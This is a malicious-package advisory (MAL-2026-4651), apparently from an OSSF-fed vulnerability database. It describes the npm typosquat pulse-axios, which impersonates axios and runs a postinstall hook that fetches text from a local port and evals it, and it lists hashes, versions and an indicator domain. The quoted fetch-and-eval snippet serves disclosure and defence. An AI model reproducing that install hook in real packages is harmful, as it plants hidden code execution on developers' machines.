MAL-2026-4651
Vulnerability from ossf_malicious_packages
Published
2026-05-20 01:56
Modified
2026-05-26 05:55
Summary
Malicious code in pulse-axios (npm)
Details
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (c64dad53e23f7fcba3813e9ae6caee3f9461f5e52194165da668e5332e78bb99)
pulse-axios@1.16.1 declares a postinstall hook (node./lib/core/eval.js) that on npm install issues fetch('http://localhost:3000/download/data'), reads the response body as text, and passes it to eval inside an async IIFE: await eval(\(async () => {\n${datab2}\n})();`). Errors are silently swallowed in an empty catch. Any bytes returned by whatever process is listening on port 3000 at install time — including any local attacker process, a co-installed malicious package's helper, or a developer-staging payload server — execute with the installer's privileges. The package additionally impersonates the legitimateaxiospackage:name: pulse-axios, description claims to be "a faster and better version of axios",authoris set toMatt Zabriskie(the real axios maintainer),repository.urlpoints tohttps://github.com/axios/axios.git, andhomepageishttps://axios-http.com`. The metadata theft is designed to fool installers into believing this is a legitimate axios variant. Combined, the package is a typosquat lure that ships an install-time RCE primitive.
CWE
Credits
{
"affected": [
{
"database_specific": {
"cwes": [
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
],
"indicators": {
"domains": [
"consequences-faces-weblogs-clinical.trycloudflare.com"
],
"evidence_files": [
{
"path": "lib/core/eval.js",
"sha256": "ec84bb94f37b0021bcea38c9b1e5c326dda236d4e9c83bfc11093e597d23a9fe",
"tlsh": "21e026aa303f26754f7123f89d57180ff722b31b76c4c1c5f39486048e326a14945e5d"
},
{
"path": "package.json",
"sha256": "19649e1b8bf32423969ba39b72913c934844eb6a991ddc1a0493a3a243706dc9",
"tlsh": "b2d1ec73c9ca4d572fb47aa8a87a9264f231c30fa551c90fb07e024c4f7572f129762a"
}
],
"package_integrity": [
{
"filename": "pulse-axios-1.17.2.tgz",
"hashes": {
"sha1": "f81c5e006cfe568db6d2524dca71a86c859d392b",
"sha512_sri": "sha512-V65XeJl04Q9VAFB6bsNTktIN64Qiw/qc9LLj4m6UFRRUSzI+5eUP3s23lP8fXnwa8a2tsMToPZGCdq/sApsSig=="
}
}
]
}
},
"package": {
"ecosystem": "npm",
"name": "pulse-axios"
},
"versions": [
"1.17.2",
"1.17.1",
"1.16.1"
]
}
],
"credits": [
{
"contact": [
"actran@amazon.com"
],
"name": "Amazon Inspector",
"type": "FINDER"
}
],
"database_specific": {
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-003766",
"import_time": "2026-05-26T05:51:16.460920647Z",
"modified_time": "2026-05-21T06:54:36Z",
"sha256": "28257d4309df99e3d275ee13a8070e9be516444fc5a5e954c864cbf7d7b1f89c",
"source": "amazon-inspector",
"versions": [
"1.17.2"
]
},
{
"id": "IN-MAL-2026-003389",
"import_time": "2026-05-26T05:50:32.977313736Z",
"modified_time": "2026-05-20T02:00:14Z",
"sha256": "5697e55222985697b89b9d1755984516563ff0a30218ac331c34aee46f3f1d07",
"source": "amazon-inspector",
"versions": [
"1.17.1"
]
},
{
"id": "IN-MAL-2026-003767",
"import_time": "2026-05-26T05:51:16.556905649Z",
"modified_time": "2026-05-21T06:54:36Z",
"sha256": "a04cbfa8262f2b1fc518a4124a825108b1895b24e6222a1306c57c136aa180a7",
"source": "amazon-inspector",
"versions": [
"1.17.2"
]
},
{
"id": "IN-MAL-2026-003385",
"import_time": "2026-05-26T05:50:32.522011889Z",
"modified_time": "2026-05-20T01:56:30Z",
"sha256": "c64dad53e23f7fcba3813e9ae6caee3f9461f5e52194165da668e5332e78bb99",
"source": "amazon-inspector",
"versions": [
"1.16.1"
]
},
{
"id": "IN-MAL-2026-003390",
"import_time": "2026-05-26T05:50:33.070727028Z",
"modified_time": "2026-05-20T02:00:14Z",
"sha256": "d53e7eba89c2c1763024ac4b829f4f12f5e5f901a407c4fc7b157417aec557f1",
"source": "amazon-inspector",
"versions": [
"1.17.1"
]
}
]
},
"details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (c64dad53e23f7fcba3813e9ae6caee3f9461f5e52194165da668e5332e78bb99)\npulse-axios@1.16.1 declares a postinstall hook (`node./lib/core/eval.js`) that on `npm install` issues `fetch(\u0027http://localhost:3000/download/data\u0027)`, reads the response body as text, and passes it to `eval` inside an async IIFE: `await eval(\\`(async () =\u003e {\\n${datab2}\\n})();\\`)`. Errors are silently swallowed in an empty catch. Any bytes returned by whatever process is listening on port 3000 at install time \u2014 including any local attacker process, a co-installed malicious package\u0027s helper, or a developer-staging payload server \u2014 execute with the installer\u0027s privileges. The package additionally impersonates the legitimate `axios` package: `name: pulse-axios`, description claims to be \"a faster and better version of axios\", `author` is set to `Matt Zabriskie` (the real axios maintainer), `repository.url` points to `https://github.com/axios/axios.git`, and `homepage` is `https://axios-http.com`. The metadata theft is designed to fool installers into believing this is a legitimate axios variant. Combined, the package is a typosquat lure that ships an install-time RCE primitive.\n",
"id": "MAL-2026-4651",
"modified": "2026-05-26T05:55:04Z",
"published": "2026-05-20T01:56:30Z",
"references": [
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/pulse-axios/v/1.17.2"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/pulse-axios/v/1.17.1"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/pulse-axios/v/1.16.1"
}
],
"schema_version": "1.7.4",
"summary": "Malicious code in pulse-axios (npm)"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…